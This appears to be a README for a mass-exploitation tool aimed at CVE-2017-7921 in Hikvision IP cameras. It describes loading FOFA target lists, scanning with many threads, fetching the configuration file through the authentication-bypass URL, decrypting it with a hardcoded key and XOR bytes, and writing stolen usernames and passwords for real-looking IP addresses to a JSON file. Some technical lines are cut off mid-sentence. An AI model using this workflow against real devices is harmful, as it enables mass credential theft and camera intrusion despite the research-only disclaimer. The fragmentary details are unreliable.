
Se utiliza para probar rápidamente la vulnerabilidad CVE-2017-7921 de Hikvision con la ayuda de FOFA, además de proporcionar la cuenta y contraseña de inicio de sesión, y generar un archivo json.
Declaración de seguridad: esta herramienta está destinada únicamente a investigación de seguridad autorizada y verificación de vulnerabilidades.
Aviso importante: el uso de esta herramienta implica su aceptación de los siguientes términos
Este proyecto sigue la Política de investigación de seguridad de GitHub y las normas de divulgación del Centro de respuesta de seguridad de Hikvision.
Herramienta de detección y verificación masiva de la vulnerabilidad de omisión de autenticación CVE-2017-7921 en cámaras IP Hikvision, con soporte para descifrado automático de archivos de configuración y extracción de credenciales.
git clone https://github.com/[你的用户名]/CVE-2017-7921-Research-Toolkit.git
cd CVE-2017-7921-Research-Toolkit
pip install -r requirements.txt
requests>=2.28.0
pycryptodome>=3.15.0
tqdm>=4.64.0
Cree la carpeta zc/ en el directorio de la herramienta y coloque la lista de dispositivos en formato JSON (un objeto de dispositivo por línea):
mkdir zc
Archivo de ejemplo: devices_2025.json
{"city":"Lisbon","country":"PT","host":"109.50.152.186","link":"http://109.50.152.186:80"}
{"city":"Sao Paulo","country":"BR","host":"200.201.192.75","link":"http://200.201.192.75:8080"}
Descripción de campos:
python batch_decrypt.py
════════════════════════════════════════════════════════════════════════════════
海康威视摄像头配置文件漏洞批量扫描工具
════════════════════════════════════════════════════════════════════════════════
可用的JSON文件:
════════════════════════════════════════════════════════════════════════════════
1. devices_2025.json (45,678 字节)
════════════════════════════════════════════════════════════════════════════════
请选择文件编号: 1
已选择文件: devices_2025.json
正在加载设备数据...
待扫描设备总数: 2000
请输入并发线程数 (默认: 5): 10
并发线程数: 10
开始扫描...
已扫描设备总数: 2000
发现漏洞设备数: 127
漏洞设备已保存到: vulnerable_devices.json
Al finalizar el escaneo se genera vulnerable_devices.json, que contiene información de todos los dispositivos vulnerables.
Ejemplo de salida:
[
{
"url": "http://109.50.152.186",
"config_url": "http://109.50.152.186/System/configurationFile?auth=YWRtaW46MTEK",
"username": "admin",
"password": "123456",
"city": "Lisbon",
"country": "PT",
"org": "ISP Telecom",
"status": "success"
}
]
/System/configurationFile?auth=YWRtaW46MTEK utiliza credenciales codificadas.279977f62f6cfd2d91cd75b889ce0c9a está codificada en el firmware.0x73, 0x8B, 0x55, 0x44).Este software está destinado únicamente a investigación de seguridad autorizada y fines educativos. El usuario debe asegurarse de cumplir con todas las leyes aplicables.
Última actualización: 2025-01-29 | Versión: v1.0.0 | CVE compatible: CVE-2017-7921
| Campo | Descripción | Obligatorio |
|---|
link | Dirección de acceso HTTP/HTTPS del dispositivo | ✅ Sí |
city | Información de la ciudad | ❌ No |
country | Código de país | ❌ No |
org | Organización/ISP | ❌ No |